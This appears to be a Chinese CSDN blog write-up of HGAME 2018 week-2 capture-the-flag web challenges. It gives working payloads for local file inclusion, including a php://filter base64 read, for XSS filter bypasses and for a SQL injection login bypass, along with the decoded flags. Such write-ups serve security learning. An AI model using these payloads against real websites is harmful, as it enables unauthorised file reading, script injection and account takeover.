hgame-2018 CTFwp(杭电信安)week2

最新推荐文章于 2024-04-02 15:58:08 发布
最新推荐文章于 2024-04-02 15:58:08 发布
阅读量766 收藏
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qingchenldl/article/details/79436198
版权

草莓社区-1

描述
flag在../flag.php中
知识点:LFI
URL http://118.25.18.223:10011/
基准分数 100
当前分数 100
完成人数 118

提示很清楚,简单的本地包含:
payload: http://118.25.18.223:10011/show_maopian.php?mao=../flag.php
mark
一开始以为不对,F12找了源文件,发现flag的base64码。解得:

>>> import base64
>>> base64.b64decode("PD9waHAKCSRmbGFnPSJoZ2FtZXsjTWEwX3BpNG5faGFPX2s0bl9tYSN9IjsK")
b'<?php\n\t$flag="hgame{#Ma0_pi4n_haO_k4n_ma#}";\n'

草莓社区- 2

描述
flag在../flag.php中
知识点:LFI
URL http://118.25.18.223:10012/
基准分数 150
当前分数 150
完成人数 103

和上一题肯定不一样咯。试了试 

http://118.25.18.223:10012/show_maopian.php?mao=php://filter/read=convert.base64-encode/resource=show_maopian.php

读取php。发现可行。

读取../flag.php试试。
mark 

>>> base64.b64decode("UEQ5d2FIQUtDU1JtYkdGblBTSm9aMkZ0WlhzaGJUUnZYM0JwTkc1ZlEyaGhUMTlvWVc5ZmEyRnVJWDBpT3dvPQ==")
b'PD9waHAKCSRmbGFnPSJoZ2FtZXshbTRvX3BpNG5fQ2hhT19oYW9fa2FuIX0iOwo='
>>> base64.b64decode("PD9waHAKCSRmbGFnPSJoZ2FtZXshbTRvX3BpNG5fQ2hhT19oYW9fa2FuIX0iOwo=")
b'<?php\n\t$flag="hgame{!m4o_pi4n_ChaO_hao_kan!}";\n'

xss-1

function charge(input) {
    input = input.replace(/script/gi, '_');
    input = input.replace(/image/gi, '_');
    input = input.replace(/\(/, '_');

    return '<article>' + input + '</article>';
}

/gi 忽略大小写,全文匹配。
过滤了srcipt,image,( 。
于是想用错误事件。
payload: 

<img src=x  onerror=alert(1);>

flag: hgame{#X5s_soo00o_e4sy#}

XSS-2

function charge(input) { 
            input = input.replace(/script/gi, '_'); 
            input = input.replace(/img/gi, '_'); 
            input = input.replace(/image/gi, '_'); 
            input = input.replace(/\(/, '_');
            input = input.replace(/\>/,'_');
            return '<input value="' + input + '" type="text">'; 
            }

过滤了script, img, image, (, >,
我一看想着,直接用Unicode算了。
payload: 

&#60;&#115;&#99;&#114;&#105;&#112;&#116;&#62;&#97;&#108;&#101;&#114;&#116;&#40;&#49;&#41;&#59;&#60;&#47;&#115;&#99;&#114;&#105;&#112;&#116;&#62;

flag: hgame{#LuCkY_y0u_a1ert_l#}

最简单的sql题

太简单了,直接万能密码就行: 

admin' or 1=1 --

flag: hgame{@s0ng_fen_ti@}

「已注销」
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
vm虚拟机-简单题目(hgame-week4-easyvm、cg-ctf wxyVM1/2
01-08
然后先写了前面的cg-ctf的两个题目,其实当时做的时候还没太大虚拟机的感觉,后面接触到hgame的题目,然后再看的时候就感觉到有些那个意思,但是两个题目是基础题目也就不是太难为人,看成数据处理的考点也做的出来...
浅谈JWT全及在ctf中出现
qq_39608382的博客
10-12 2560
什么是JWT?JWT攻击方式 JWT在CTF中的出现
BUUCTF题目Misc部分wp(持续更新)
苦行僧的妖孽日常
11-05 6695
BUUCTF题目Misc部分wp(持续更新)
ctf_show笔记篇(web入门---jwt)
最新发布
whale_waves的博客
04-02 1150
JSON Web Token(JWT)通常由三部分组成简单地说jwt就是一串字符串,类似于序列化这种,把用户的信息保存在字符串里JWT全称是,如果从字面上理解感觉是基于JSON格式用于网络传输的令牌。实际上,JWT是一种紧凑的Claims声明格式,旨在用于空间受限的环境进行传输,常见的场景如HTTP授权请求头参数和URI查询参数。JWT会把Claims转换成JSON格式,而这个JSON内容将会应用为JWS结构的有效载荷或者应用为JWE结构的(加密处理后的)原始字符串,通过消息认证码(或者简称MAC。
ctfshow web入门 JWT
Anton1a的博客
02-24 4239
web345 打开题目先F12看一下源码发现一个admin目录,然后抓包看见cookie里面有jwt 然后将jwt进行base64解密,然后将解码后的user换成admin 再进行base64加密,然后抓包访问admin目录,之后将刚才生成的jwt,替换cookie里的jwt然后发包拿到flag 这里只需要注意访问的是/admin/而不是/admin因为访问/admin表示访问admin.php而访问/admin/表示访问的是admin目录下默认的index.php web346 这.
CTF练习题WP1
m0_73891130的博客
03-25 584
自己写的CTF常用网站的练习题目的WP,当然也有参考网上的大佬的WP
[CTF]HGAME2021 WP
Sapphire037的博客
02-18 1415
MISC 群青(其实是幽灵东京) wav,audicaty看频谱图 文件属性让我们试试silenteye,解密得到 访问,下载后文件名提示了SSTV,可以扫出 hgame{1_c4n_5ee_the_wav} WEB Fujiwara Tofu Shop 首先给了 猜到是要加referer头,所以加个头referer: qiumingshan.net 然后 那么我们知道 User Agent中文名为用户代理,简称 UA,它是一个特殊字符串头,使得服务器能够识别客户使用的操作系统及版本、CPU 类型、
HGAME cdcollector-开源
04-24
这是现有项目cdcollector的mod,用于为拥有过多数据库的人使用phpmysql存储您的HGAMES数据库。
0hgame:用0h制作的游戏->阅读README
05-01
)2- DO NOT TOUCH BLACK THINGS IF YOU DONT WANT TO START AGAIN3- Try to reach the other side of the window to became the king of the penguins4- Enjoy it. (it is a rule, so if you are not enjoying the ...
hgame:Haskell 游戏引擎
05-30
游戏 Haskell 游戏引擎
Tales Of Vesperia HD Wallpapers Game Theme-crx插件
03-14
包括每个选项卡背景上来自hgame Tasp Of Vesperia Definitive的高清壁纸图像。 装此扩展程序,以在每个新选项卡上获得《 Vesperia传说最终版》的高清图像! 我们始终会更新图像,因此请随时检查...我们将为您提供5...
2023 天使杯CTF --- wp
3tefanie丶zhou的博客
06-03 1159
【人,终究会被年少不可得之物困其一生】
ctf wp 汇总
freshfox的博客
07-06 1026
ctf
CTF-Hgame_accuracy_writeup
qq_19917367的博客
07-29 428
把相关的代码记录一下, 方便以后使用 accuracy 石碑上的文字,究竟隐藏着怎样的秘密…… Write Up 题目给出两个文件, chars.csv dataset.csv, 简单查看之后,dataset是数据集, chars是测试集 数据集是由784个pixel, 即 28 * 28 df.iloc[:,0].unique() #array([10, 11, 12, 13, 14, 15, 1, 0, 4, 7, 3, 5, 8, 9, 2, 6]) 查看标签,共有1
HgameCTF 2024 web&misc wp
Nanian233的博客
03-07 738
HgameCTF 2024 web&misc 个人wp
Json web token (JWT)渗透与防御及ctf例题
weixin_65582330的博客
03-06 914
可以看到我们登录进去后,用f12检测可以发现他有着jwt形式的token,这里也可以用bp进行抓包,下面用kali中的jwt_tool工具进行破解,可以看到flag。算法为none是因为开发人员为了更方便的修改,把header部分设置为none,从而不用进行第三部分签名的认证。从题目中可以知道必须要成为admin才可以得到flag,而我们是guest,所以我们可以试试把签名设置为空。还有一道类似的题,需要用到爆破工具,可以抓到包,看到jwt数据,拿到kali中进行jwt工具的扫描。
2021黑盾杯CTF部分WP
qq_45149716的博客
12-05 4964
一、 Signin 通过观察附件得到附件为一个文本 全由01组成 根据以往的经验来是这个应该是是通过PIL库将01转换为像素点来构造二维码 from PIL import Image MAX = 500 pic = Image.new("RGB", (MAX, MAX)) str="1111...1111" #文档太大所以省略了文档内容" i = 0 for y in range(0, MAX): for x in range(0, MAX): if str[i] == '1':
【第六届强网杯CTF-Wp】
qq_45603443的博客
08-02 2415
第六届强网杯全国网络全挑战赛wp
【CTFSHOW】web入门 JWT
7ruth0hn的博客
09-27 943
文章目录写在前面JWT浅析web345web346web347web348web349web350参考资料 写在前面 陇剑杯初赛出了JWT专题的赛题,被同队大佬ak了,一直不太懂,来刷刷 JWT浅析 JWT即JSON WEB TOKEN,由三个部分组成,并用两个“.”进行连接。第一部分为header(base64加密),第二部分为payload(base64加密),第三部分为verify signature,它的构成如下: HEADER中alg对应的加密方式为HS256,也可以选择其他对称或非对称的加密方
请你完善上面的代码 添加从E:\Desktop\2024hgame\week1\crypto\奇怪的图片\png_out文件夹里面获取图片的功能
02-04
以下是完善代码的示例,添加...folder_path = "E:/Desktop/2024hgame/week1/crypto/奇怪的图片/png_out" # 获取文件夹中的图片 images = get_images_from_folder(folder_path) # 在代码中使用获取到的图片 # ... ```

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值